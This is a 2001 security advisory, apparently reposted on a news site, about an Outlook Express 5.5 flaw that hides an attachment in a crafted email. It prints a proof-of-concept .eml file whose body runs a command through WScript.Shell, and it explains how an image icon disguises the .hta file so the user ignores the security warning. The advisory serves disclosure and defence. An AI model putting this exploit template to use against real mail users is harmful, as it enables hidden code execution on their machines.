find us on facebook!
 

HTML.dropper Vulnerability Allows Creation of Emails That Contain Hidden Attachments


January 23, 2001

Internet Explorer 5.5 and the accompanying mail and news client provide attackers the unique ability to dictate which icons and file extensions are required. Specifically, attackers can manufacture an email message that appears as one thing when in fact it is not.

By carefully calculating a certain length of characters in the subject field of an email message, Outlook Express 5.5 for whatever reason creates an attachment incorporating the text in the body of the message. This allows a malicious attacker to create emails that contain attachment (when open under Outlook Express) but do not contain an attachment header (e.g. MIME tags that indict that an attachment is present).

Details Vulnerable systems:

Internet Explorer 5.5 with Outlook Express 5.5

Exploit:

Create the following email (a file called .eml that contains the following):

(NOTE: Spaces in the subject have been wrapped, they should be on one long line, ending with .hta)

----

MIME-Version: 1.0

To: http-equiv@excite.com

Subject:

.hta

Content-Type: image/gif; charset=us-ascii

Content-Transfer-Encoding: 7bit

var wsh=new ActiveXObject('WScript.Shell'); wsh.Run('telnet.exe');

----

The exploit will create an email message with no reference to attachments in the headers. This can be particularly troublesome to content filtering gateways and/or security applications that strip attachments through header information that is content disposition: attachment; content-type: application/malware; filename: iloveyou.vbs

What the above does is create an attachment, which in this case is an *.hta file, but by manipulating the content-type, it is given an image file icon. We then include in the body of our email message the very simple code to execute whatever we wish, which is automatically incorporated into the manufactured attachment.

Notes:

1. There is still the security warning with opening the file. However the icon representing the content type should override, most if not all's concern.

2. The actual file extension (*.hta in this case) seems to have to appear in the security warning dialog, you can see it at the very end to execute. If the subject length is too long, it creates an odd *.txt file which calls up something like 'what do you want to open this with '.

3. This appears to be somewhat similar to something examined several months ago:

Force Feeding files to Internet Explorer

First appeared at http://www.SecuriTeam.com. More about Beyond Security: http://www.BeyondSecurity.com

© 2001 Beyond Security Ltd


« Back to the news list

 
(c) EMMA Labs, 2016 | No Spam Policy